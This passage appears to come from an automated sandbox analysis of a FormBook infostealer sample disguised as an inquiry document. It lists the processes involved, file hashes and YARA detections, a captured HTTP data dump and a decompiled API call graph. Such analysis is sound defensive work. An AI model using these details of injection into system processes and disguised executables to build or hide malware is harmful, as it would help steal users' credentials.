                                        Sep 3, 2024 13:55:51.697866917 CEST1236INData Raw: 65 6c 64 2d 68 69 64 64 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74
                                        Data Ascii: eld-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}:where(.wp-block-searc
                                        Sep 3, 2024 13:55:51.702735901 CEST1236INData Raw: 77 72 61 70 3a 77 72 61 70 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 38 32 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 7b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 77 72 61 70 21 69 6d
                                        Data Ascii: wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:07:52:45
                                        Start date:03/09/2024
                                        Path:C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
                                        Imagebase:0xdf0000
                                        File size:1'163'264 bytes
                                        MD5 hash:F295444B03C418B35DCB676ED284E846
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:07:52:46
                                        Start date:03/09/2024
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
                                        Imagebase:0x710000
                                        File size:46'504 bytes
                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:07:53:11
                                        Start date:03/09/2024
                                        Path:C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe"
                                        Imagebase:0x3f0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:6
                                        Start time:07:53:12
                                        Start date:03/09/2024
                                        Path:C:\Windows\SysWOW64\rasdial.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                        Imagebase:0x120000
                                        File size:19'456 bytes
                                        MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:7
                                        Start time:07:53:36
                                        Start date:03/09/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff6bf500000
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:4.3%
                                          Dynamic/Decrypted Code Coverage:0.4%
                                          Signature Coverage:7.2%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:156
                                          execution_graph 97198 df107d 97203 df71eb 97198->97203 97200 df108c 97234 e12f80 97200->97234 97204 df71fb __write_nolock 97203->97204 97237 df77c7 97204->97237 97208 df72ba 97249 e1074f 97208->97249 97215 df77c7 59 API calls 97216 df72eb 97215->97216 97268 df7eec 97216->97268 97218 df72f4 RegOpenKeyExW 97219 e2ecda RegQueryValueExW 97218->97219 97223 df7316 Mailbox 97218->97223 97220 e2ecf7 97219->97220 97221 e2ed6c RegCloseKey 97219->97221 97272 e10ff6 97220->97272 97221->97223 97233 e2ed7e _wcscat Mailbox __wsetenvp 97221->97233 97223->97200 97224 e2ed10 97282 df538e 97224->97282 97227 e2ed38 97285 df7d2c 97227->97285 97229 df7b52 59 API calls 97229->97233 97230 e2ed52 97230->97221 97232 df3f84 59 API calls 97232->97233 97233->97223 97233->97229 97233->97232 97294 df7f41 97233->97294 97359 e12e84 97234->97359 97236 df1096 97238 e10ff6 Mailbox 59 API calls 97237->97238 97239 df77e8 97238->97239 97240 e10ff6 Mailbox 59 API calls 97239->97240 97241 df72b1 97240->97241 97242 df4864 97241->97242 97298 e21b90 97242->97298 97245 df7f41 59 API calls 97246 df4897 97245->97246 97300 df48ae 97246->97300 97248 df48a1 Mailbox 97248->97208 97250 e21b90 __write_nolock 97249->97250 97251 e1075c GetFullPathNameW 97250->97251 97252 e1077e 97251->97252 97253 df7d2c 59 API calls 97252->97253 97254 df72c5 97253->97254 97255 df7e0b 97254->97255 97256 df7e1f 97255->97256 97257 e2f173 97255->97257 97322 df7db0 97256->97322 97327 df8189 97257->97327 97260 e2f17e __wsetenvp _memmove 97261 df72d3 97262 df3f84 97261->97262 97263 df3f92 97262->97263 97267 df3fb4 _memmove 97262->97267 97265 e10ff6 Mailbox 59 API calls 97263->97265 97264 e10ff6 Mailbox 59 API calls 97266 df3fc8 97264->97266 97265->97267 97266->97215 97267->97264 97269 df7f06 97268->97269 97271 df7ef9 97268->97271 97270 e10ff6 Mailbox 59 API calls 97269->97270 97270->97271 97271->97218 97275 e10ffe 97272->97275 97274 e11018 97274->97224 97275->97274 97277 e1101c std::exception::exception 97275->97277 97330 e1594c 97275->97330 97347 e135e1 DecodePointer 97275->97347 97348 e187db RaiseException 97277->97348 97279 e11046 97349 e18711 58 API calls _free 97279->97349 97281 e11058 97281->97224 97283 e10ff6 Mailbox 59 API calls 97282->97283 97284 df53a0 RegQueryValueExW 97283->97284 97284->97227 97284->97230 97286 df7d38 __wsetenvp 97285->97286 97287 df7da5 97285->97287 97289 df7d4e 97286->97289 97290 df7d73 97286->97290 97288 df7e8c 59 API calls 97287->97288 97293 df7d56 _memmove 97288->97293 97358 df8087 59 API calls Mailbox 97289->97358 97292 df8189 59 API calls 97290->97292 97292->97293 97293->97230 97295 df7f50 __wsetenvp _memmove 97294->97295 97296 e10ff6 Mailbox 59 API calls 97295->97296 97297 df7f8e 97296->97297 97297->97233 97299 df4871 GetModuleFileNameW 97298->97299 97299->97245 97301 e21b90 __write_nolock 97300->97301 97302 df48bb GetFullPathNameW 97301->97302 97303 df48da 97302->97303 97304 df48f7 97302->97304 97306 df7d2c 59 API calls 97303->97306 97305 df7eec 59 API calls 97304->97305 97307 df48e6 97305->97307 97306->97307 97310 df7886 97307->97310 97311 df7894 97310->97311 97314 df7e8c 97311->97314 97313 df48f2 97313->97248 97315 df7e9a 97314->97315 97317 df7ea3 _memmove 97314->97317 97315->97317 97318 df7faf 97315->97318 97317->97313 97319 df7fc2 97318->97319 97321 df7fbf _memmove 97318->97321 97320 e10ff6 Mailbox 59 API calls 97319->97320 97320->97321 97321->97317 97323 df7dbf __wsetenvp 97322->97323 97324 df8189 59 API calls 97323->97324 97325 df7dd0 _memmove 97323->97325 97326 e2f130 _memmove 97324->97326 97325->97261 97328 e10ff6 Mailbox 59 API calls 97327->97328 97329 df8193 97328->97329 97329->97260 97331 e159c7 97330->97331 97344 e15958 97330->97344 97356 e135e1 DecodePointer 97331->97356 97333 e159cd 97357 e18d68 58 API calls __getptd_noexit 97333->97357 97334 e15963 97334->97344 97350 e1a3ab 58 API calls 2 library calls 97334->97350 97351 e1a408 58 API calls 8 library calls 97334->97351 97352 e132df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97334->97352 97337 e1598b RtlAllocateHeap 97338 e159bf 97337->97338 97337->97344 97338->97275 97340 e159b3 97354 e18d68 58 API calls __getptd_noexit 97340->97354 97344->97334 97344->97337 97344->97340 97345 e159b1 97344->97345 97353 e135e1 DecodePointer 97344->97353 97355 e18d68 58 API calls __getptd_noexit 97345->97355 97347->97275 97348->97279 97349->97281 97350->97334 97351->97334 97353->97344 97354->97345 97355->97338 97356->97333 97357->97338 97358->97293 97360 e12e90 __mtinitlocknum 97359->97360 97367 e13457 97360->97367 97366 e12eb7 __mtinitlocknum 97366->97236 97384 e19e4b 97367->97384 97369 e12e99 97370 e12ec8 DecodePointer DecodePointer 97369->97370 97371 e12ef5 97370->97371 97372 e12ea5 97370->97372 97371->97372 97430 e189e4 59 API calls strtoxl 97371->97430 97381 e12ec2 97372->97381 97374 e12f58 EncodePointer EncodePointer 97374->97372 97375 e12f2c 97375->97372 97379 e12f46 EncodePointer 97375->97379 97432 e18aa4 61 API calls 2 library calls 97375->97432 97376 e12f07 97376->97374 97376->97375 97431 e18aa4 61 API calls 2 library calls 97376->97431 97379->97374 97380 e12f40 97380->97372 97380->97379 97433 e13460 97381->97433 97385 e19e5c 97384->97385 97386 e19e6f EnterCriticalSection 97384->97386 97391 e19ed3 97385->97391 97386->97369 97388 e19e62 97388->97386 97415 e132f5 58 API calls 3 library calls 97388->97415 97392 e19edf __mtinitlocknum 97391->97392 97393 e19f00 97392->97393 97394 e19ee8 97392->97394 97402 e19f21 __mtinitlocknum 97393->97402 97419 e18a5d 58 API calls 2 library calls 97393->97419 97416 e1a3ab 58 API calls 2 library calls 97394->97416 97397 e19eed 97417 e1a408 58 API calls 8 library calls 97397->97417 97398 e19f15 97400 e19f2b 97398->97400 97401 e19f1c 97398->97401 97405 e19e4b __lock 58 API calls 97400->97405 97420 e18d68 58 API calls __getptd_noexit 97401->97420 97402->97388 97403 e19ef4 97418 e132df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97403->97418 97407 e19f32 97405->97407 97409 e19f57 97407->97409 97410 e19f3f 97407->97410 97422 e12f95 97409->97422 97421 e1a06b InitializeCriticalSectionAndSpinCount 97410->97421 97413 e19f4b 97428 e19f73 LeaveCriticalSection _doexit 97413->97428 97416->97397 97417->97403 97419->97398 97420->97402 97421->97413 97423 e12fc7 _free 97422->97423 97424 e12f9e RtlFreeHeap 97422->97424 97423->97413 97424->97423 97425 e12fb3 97424->97425 97429 e18d68 58 API calls __getptd_noexit 97425->97429 97427 e12fb9 GetLastError 97427->97423 97428->97402 97429->97427 97430->97376 97431->97375 97432->97380 97436 e19fb5 LeaveCriticalSection 97433->97436 97435 e12ec7 97435->97366 97436->97435 97437 e30226 97443 dfade2 Mailbox 97437->97443 97439 e30c86 97519 e466f4 59 API calls Mailbox 97439->97519 97441 e30c8f 97443->97439 97443->97441 97444 e300e0 VariantClear 97443->97444 97445 dfb6c1 97443->97445 97449 e6e237 97443->97449 97452 e683a8 97443->97452 97512 df9df0 97443->97512 97517 e47405 59 API calls 97443->97517 97444->97443 97518 e5a0b5 89 API calls 4 library calls 97445->97518 97520 e6cdf1 97449->97520 97451 e6e247 97451->97443 97711 df9a20 97452->97711 97454 e683ca CoInitialize 97455 e683e3 CoUninitialize 97454->97455 97456 e683e9 VariantInit 97454->97456 97455->97456 97457 e68411 97456->97457 97458 e68605 97456->97458 97460 e685e4 97457->97460 97461 e68418 97457->97461 97459 e10ff6 Mailbox 59 API calls 97458->97459 97462 e68616 97459->97462 97463 df9997 84 API calls 97460->97463 97464 e68487 97461->97464 97465 e6841b 97461->97465 97468 e68639 97462->97468 97472 df9997 84 API calls 97462->97472 97469 e685f1 97463->97469 97475 e6849e 97464->97475 97476 e6859d 97464->97476 97466 e68422 97465->97466 97467 e686ba VariantClear 97465->97467 97471 df9997 84 API calls 97466->97471 97467->97443 97490 e6855b 97468->97490 97730 e57804 105 API calls Mailbox 97468->97730 97470 df9997 84 API calls 97469->97470 97470->97458 97473 e6842f 97471->97473 97474 e68629 97472->97474 97477 df9997 84 API calls 97473->97477 97713 e4da5d 97474->97713 97725 df9c9c 59 API calls 97475->97725 97478 df9997 84 API calls 97476->97478 97483 e68445 97477->97483 97484 e685a2 97478->97484 97482 e684a3 97485 e684c7 97482->97485 97726 df9c9c 59 API calls 97482->97726 97486 df9997 84 API calls 97483->97486 97487 df9997 84 API calls 97484->97487 97495 e10ff6 Mailbox 59 API calls 97485->97495 97489 e68457 97486->97489 97491 e685b4 97487->97491 97493 df9997 84 API calls 97489->97493 97490->97467 97731 e696db 341 API calls Mailbox 97490->97731 97494 df9997 84 API calls 97491->97494 97492 e684b8 97492->97485 97727 df9c9c 59 API calls 97492->97727 97496 e6846b 97493->97496 97497 e685c8 97494->97497 97504 e684ed 97495->97504 97724 e69a72 358 API calls 3 library calls 97496->97724 97729 e69a72 358 API calls 3 library calls 97497->97729 97502 e68482 97502->97467 97503 e685df 97503->97490 97505 e68538 97504->97505 97507 e68509 97504->97507 97508 df9997 84 API calls 97504->97508 97505->97490 97728 e57804 105 API calls Mailbox 97505->97728 97509 df9997 84 API calls 97507->97509 97508->97507 97510 e68525 97509->97510 97511 e4da5d 14 API calls 97510->97511 97511->97505 97514 df9dfb 97512->97514 97513 df9e32 97513->97443 97514->97513 97515 df8e34 Mailbox 59 API calls 97514->97515 97516 df9e5d 97515->97516 97516->97443 97517->97443 97518->97439 97519->97441 97558 df9997 97520->97558 97524 e6d0cd 97525 e6d242 97524->97525 97529 e6d0db 97524->97529 97659 e6dbdc 92 API calls Mailbox 97525->97659 97528 e6d251 97528->97529 97530 e6d25d 97528->97530 97589 e6cc82 97529->97589 97545 e6ce75 Mailbox 97530->97545 97531 df9997 84 API calls 97548 e6cec6 Mailbox 97531->97548 97536 e6d114 97604 e10e48 97536->97604 97539 e6d147 97608 df942e 97539->97608 97540 e6d12e 97645 e5a0b5 89 API calls 4 library calls 97540->97645 97543 e6d139 GetCurrentProcess TerminateProcess 97543->97539 97545->97451 97548->97524 97548->97531 97548->97545 97643 e5f835 59 API calls 2 library calls 97548->97643 97644 e6d2f3 61 API calls 2 library calls 97548->97644 97549 e6d2b8 97549->97545 97553 e6d2cc FreeLibrary 97549->97553 97550 df8ea0 59 API calls 97551 e6d17f 97550->97551 97554 e6d95d 107 API calls 97551->97554 97553->97545 97557 e6d190 97554->97557 97557->97549 97619 df8ea0 97557->97619 97630 e6d95d 97557->97630 97646 df9e9c 97557->97646 97559 df99ab 97558->97559 97560 df99b1 97558->97560 97559->97545 97576 e6dab9 97559->97576 97561 e2f9fc __i64tow 97560->97561 97562 df99f9 97560->97562 97564 df99b7 __itow 97560->97564 97568 e2f903 97560->97568 97660 e138d8 83 API calls 3 library calls 97562->97660 97566 e10ff6 Mailbox 59 API calls 97564->97566 97567 df99d1 97566->97567 97567->97559 97570 df7f41 59 API calls 97567->97570 97569 e10ff6 Mailbox 59 API calls 97568->97569 97571 e2f97b Mailbox _wcscpy 97568->97571 97572 e2f948 97569->97572 97570->97559 97661 e138d8 83 API calls 3 library calls 97571->97661 97573 e10ff6 Mailbox 59 API calls 97572->97573 97574 e2f96e 97573->97574 97574->97571 97575 df7f41 59 API calls 97574->97575 97575->97571 97577 df7faf 59 API calls 97576->97577 97578 e6dad4 CharLowerBuffW 97577->97578 97662 e4f658 97578->97662 97581 e6db30 Mailbox 97586 e6db6c Mailbox 97581->97586 97682 e6d2f3 61 API calls 2 library calls 97581->97682 97583 df77c7 59 API calls 97584 e6db0d 97583->97584 97669 df79ab 97584->97669 97586->97548 97587 e6db24 97588 df7e8c 59 API calls 97587->97588 97588->97581 97590 e6cc9d 97589->97590 97594 e6ccf2 97589->97594 97591 e10ff6 Mailbox 59 API calls 97590->97591 97592 e6ccbf 97591->97592 97593 e10ff6 Mailbox 59 API calls 97592->97593 97592->97594 97593->97592 97595 e6dd64 97594->97595 97596 e6df8d Mailbox 97595->97596 97603 e6dd87 _strcat _wcscpy __wsetenvp 97595->97603 97596->97536 97597 df9d46 59 API calls 97597->97603 97598 df9c9c 59 API calls 97598->97603 97599 df9cf8 59 API calls 97599->97603 97600 e1594c 58 API calls std::exception::_Copy_str 97600->97603 97601 df9997 84 API calls 97601->97603 97603->97596 97603->97597 97603->97598 97603->97599 97603->97600 97603->97601 97686 e55b29 61 API calls 2 library calls 97603->97686 97606 e10e5d 97604->97606 97605 e10ef5 VirtualAlloc 97607 e10ec3 97605->97607 97606->97605 97606->97607 97607->97539 97607->97540 97609 df9436 97608->97609 97610 e10ff6 Mailbox 59 API calls 97609->97610 97611 df9444 97610->97611 97612 df9450 97611->97612 97687 df935c 59 API calls Mailbox 97611->97687 97614 df91b0 97612->97614 97688 df92c0 97614->97688 97616 df91bf 97617 e10ff6 Mailbox 59 API calls 97616->97617 97618 df925b 97616->97618 97617->97618 97618->97550 97618->97557 97620 df8eb2 97619->97620 97623 df8ebb 97620->97623 97696 df8d3b 59 API calls Mailbox 97620->97696 97622 df8f78 97622->97557 97623->97622 97624 e10ff6 Mailbox 59 API calls 97623->97624 97625 df8fcc 97624->97625 97626 e10ff6 Mailbox 59 API calls 97625->97626 97628 df8fef 97625->97628 97627 df8fdc 97626->97627 97627->97628 97629 df7f41 59 API calls 97627->97629 97628->97557 97629->97628 97631 e6d975 97630->97631 97636 e6d991 97630->97636 97632 e6da46 97631->97632 97633 e6d97c 97631->97633 97634 e6d99d 97631->97634 97631->97636 97700 e57804 105 API calls Mailbox 97632->97700 97697 e5573e 61 API calls 2 library calls 97633->97697 97699 df9bf8 59 API calls Mailbox 97634->97699 97635 e6da6c 97635->97557 97636->97635 97639 e12f95 _free 58 API calls 97636->97639 97639->97635 97641 e6d986 97698 df9bf8 59 API calls Mailbox 97641->97698 97643->97548 97644->97548 97645->97543 97647 df9eaa 97646->97647 97657 df9ed8 Mailbox 97646->97657 97648 df9efd 97647->97648 97652 df9eb0 Mailbox 97647->97652 97701 df81a7 97648->97701 97650 e2fe38 97650->97657 97709 e47405 59 API calls 97650->97709 97651 df9ec4 97653 df9ecf 97651->97653 97654 df9f2c 97651->97654 97651->97657 97652->97650 97652->97651 97656 e2fe0f VariantClear 97653->97656 97653->97657 97654->97657 97705 df8e34 97654->97705 97656->97657 97657->97557 97659->97528 97660->97564 97661->97561 97663 e4f683 __wsetenvp 97662->97663 97664 e4f6c2 97663->97664 97667 e4f6b8 97663->97667 97668 e4f769 97663->97668 97664->97581 97664->97583 97667->97664 97683 df7a24 61 API calls 97667->97683 97668->97664 97684 df7a24 61 API calls 97668->97684 97670 df79ba 97669->97670 97671 df7a17 97669->97671 97670->97671 97673 df79c5 97670->97673 97672 df7e8c 59 API calls 97671->97672 97678 df79e8 _memmove 97672->97678 97674 e2ef32 97673->97674 97675 df79e0 97673->97675 97676 df8189 59 API calls 97674->97676 97685 df8087 59 API calls Mailbox 97675->97685 97679 e2ef3c 97676->97679 97678->97587 97680 e10ff6 Mailbox 59 API calls 97679->97680 97681 e2ef5c 97680->97681 97682->97586 97683->97667 97684->97668 97685->97678 97686->97603 97687->97612 97689 df92c9 Mailbox 97688->97689 97690 e2f5c8 97689->97690 97695 df92d3 97689->97695 97691 e10ff6 Mailbox 59 API calls 97690->97691 97692 e2f5d4 97691->97692 97693 df92da 97693->97616 97694 df9df0 Mailbox 59 API calls 97694->97695 97695->97693 97695->97694 97696->97623 97697->97641 97698->97636 97699->97636 97700->97636 97702 df81ba 97701->97702 97703 df81b2 97701->97703 97702->97657 97710 df80d7 59 API calls 2 library calls 97703->97710 97706 df8e3c Mailbox 97705->97706 97707 df92c0 Mailbox 59 API calls 97706->97707 97708 df8e47 97706->97708 97707->97708 97708->97657 97709->97657 97710->97702 97712 df9a2b 97711->97712 97712->97454 97732 e4dc20 97713->97732 97716 e4dab1 CoCreateInstance 97717 e4daee 97716->97717 97718 e4dacf 97716->97718 97717->97718 97719 e4daf9 SetErrorMode GetProcAddress 97717->97719 97718->97468 97720 e4db18 97719->97720 97723 e4db1f 97719->97723 97737 e4dd22 GetModuleFileNameW LoadTypeLibEx RegisterTypeLib RegisterTypeLibForUser 97720->97737 97722 e4db8d SetErrorMode 97722->97718 97723->97722 97724->97502 97725->97482 97726->97492 97727->97485 97728->97490 97729->97503 97730->97490 97731->97467 97738 e47652 97732->97738 97735 e4dc50 IIDFromString 97736 e4daa9 97735->97736 97736->97716 97736->97718 97737->97723 97739 e47667 97738->97739 97740 e4766d CLSIDFromProgID 97738->97740 97739->97740 97741 e476b0 CLSIDFromString 97740->97741 97742 e4767b 97740->97742 97743 e476bc 97741->97743 97742->97743 97744 e4767f ProgIDFromCLSID 97742->97744 97743->97735 97743->97736 97744->97743 97745 e47694 lstrcmpiW 97744->97745 97746 e476a5 CoTaskMemFree 97745->97746 97747 e476a2 97745->97747 97746->97743 97747->97746 97748 df1016 97753 df4ad2 97748->97753 97751 e12f80 __cinit 67 API calls 97752 df1025 97751->97752 97754 e10ff6 Mailbox 59 API calls 97753->97754 97755 df4ada 97754->97755 97756 df101b 97755->97756 97760 df4a94 97755->97760 97756->97751 97761 df4a9d 97760->97761 97762 df4aaf 97760->97762 97763 e12f80 __cinit 67 API calls 97761->97763 97764 df4afe 97762->97764 97763->97762 97765 df77c7 59 API calls 97764->97765 97766 df4b16 GetVersionExW 97765->97766 97767 df7d2c 59 API calls 97766->97767 97768 df4b59 97767->97768 97769 df7e8c 59 API calls 97768->97769 97780 df4b86 97768->97780 97770 df4b7a 97769->97770 97771 df7886 59 API calls 97770->97771 97771->97780 97772 df4bf1 GetCurrentProcess IsWow64Process 97774 df4c0a 97772->97774 97773 e2dc8d 97775 df4c89 GetSystemInfo 97774->97775 97776 df4c20 97774->97776 97777 df4c56 97775->97777 97788 df4c95 97776->97788 97777->97756 97780->97772 97780->97773 97781 df4c7d GetSystemInfo 97783 df4c47 97781->97783 97782 df4c32 97784 df4c95 2 API calls 97782->97784 97783->97777 97785 df4c4d FreeLibrary 97783->97785 97786 df4c3a GetNativeSystemInfo 97784->97786 97785->97777 97786->97783 97789 df4c2e 97788->97789 97790 df4c9e LoadLibraryA 97788->97790 97789->97781 97789->97782 97790->97789 97791 df4caf GetProcAddress 97790->97791 97791->97789 97792 df1055 97797 df2649 97792->97797 97795 e12f80 __cinit 67 API calls 97796 df1064 97795->97796 97798 df77c7 59 API calls 97797->97798 97799 df26b7 97798->97799 97804 df3582 97799->97804 97802 df2754 97803 df105a 97802->97803 97807 df3416 59 API calls 2 library calls 97802->97807 97803->97795 97808 df35b0 97804->97808 97807->97802 97809 df35a1 97808->97809 97810 df35bd 97808->97810 97809->97802 97810->97809 97811 df35c4 RegOpenKeyExW 97810->97811 97811->97809 97812 df35de RegQueryValueExW 97811->97812 97813 df35ff 97812->97813 97814 df3614 RegCloseKey 97812->97814 97813->97814 97814->97809 97815 df3633 97816 df366a 97815->97816 97817 df3688 97816->97817 97818 df36e7 97816->97818 97853 df36e5 97816->97853 97822 df375d PostQuitMessage 97817->97822 97823 df3695 97817->97823 97820 df36ed 97818->97820 97821 e2d31c 97818->97821 97819 df36ca DefWindowProcW 97857 df36d8 97819->97857 97827 df3715 SetTimer RegisterWindowMessageW 97820->97827 97828 df36f2 97820->97828 97871 e011d0 10 API calls Mailbox 97821->97871 97822->97857 97824 e2d38f 97823->97824 97825 df36a0 97823->97825 97886 e52a16 71 API calls _memset 97824->97886 97829 df36a8 97825->97829 97830 df3767 97825->97830 97831 df373e CreatePopupMenu 97827->97831 97827->97857 97834 df36f9 KillTimer 97828->97834 97835 e2d2bf 97828->97835 97836 e2d374 97829->97836 97837 df36b3 97829->97837 97860 df4531 97830->97860 97831->97857 97833 e2d343 97872 e011f3 341 API calls Mailbox 97833->97872 97867 df44cb Shell_NotifyIconW _memset 97834->97867 97841 e2d2c4 97835->97841 97842 e2d2f8 MoveWindow 97835->97842 97836->97819 97885 e4817e 59 API calls Mailbox 97836->97885 97844 df374b 97837->97844 97849 df36be 97837->97849 97838 e2d3a1 97838->97819 97838->97857 97845 e2d2e7 SetFocus 97841->97845 97846 e2d2c8 97841->97846 97842->97857 97869 df45df 81 API calls _memset 97844->97869 97845->97857 97846->97849 97850 e2d2d1 97846->97850 97847 df370c 97868 df3114 DeleteObject DestroyWindow Mailbox 97847->97868 97849->97819 97873 df44cb Shell_NotifyIconW _memset 97849->97873 97870 e011d0 10 API calls Mailbox 97850->97870 97853->97819 97854 df375b 97854->97857 97858 e2d368 97874 df43db 97858->97874 97861 df45ca 97860->97861 97862 df4548 _memset 97860->97862 97861->97857 97887 df410d 97862->97887 97864 df45b3 KillTimer SetTimer 97864->97861 97865 df456f 97865->97864 97866 e2d6c0 Shell_NotifyIconW 97865->97866 97866->97864 97867->97847 97868->97857 97869->97854 97870->97857 97871->97833 97872->97849 97873->97858 97875 df4406 _memset 97874->97875 97930 df4213 97875->97930 97878 df448b 97880 df44a5 Shell_NotifyIconW 97878->97880 97881 df44c1 Shell_NotifyIconW 97878->97881 97882 df44b3 97880->97882 97881->97882 97883 df410d 61 API calls 97882->97883 97884 df44ba 97883->97884 97884->97853 97885->97853 97886->97838 97888 df4129 97887->97888 97889 df4200 Mailbox 97887->97889 97909 df7b76 97888->97909 97889->97865 97892 df4144 97894 df7d2c 59 API calls 97892->97894 97893 e2d5dd LoadStringW 97896 e2d5f7 97893->97896 97895 df4159 97894->97895 97895->97896 97897 df416a 97895->97897 97898 df7c8e 59 API calls 97896->97898 97899 df4205 97897->97899 97900 df4174 97897->97900 97903 e2d601 97898->97903 97901 df81a7 59 API calls 97899->97901 97914 df7c8e 97900->97914 97906 df417e _memset _wcscpy 97901->97906 97904 df7e0b 59 API calls 97903->97904 97903->97906 97905 e2d623 97904->97905 97907 df7e0b 59 API calls 97905->97907 97908 df41e6 Shell_NotifyIconW 97906->97908 97907->97906 97908->97889 97910 e10ff6 Mailbox 59 API calls 97909->97910 97911 df7b9b 97910->97911 97912 df8189 59 API calls 97911->97912 97913 df4137 97912->97913 97913->97892 97913->97893 97915 e2f094 97914->97915 97916 df7ca0 97914->97916 97929 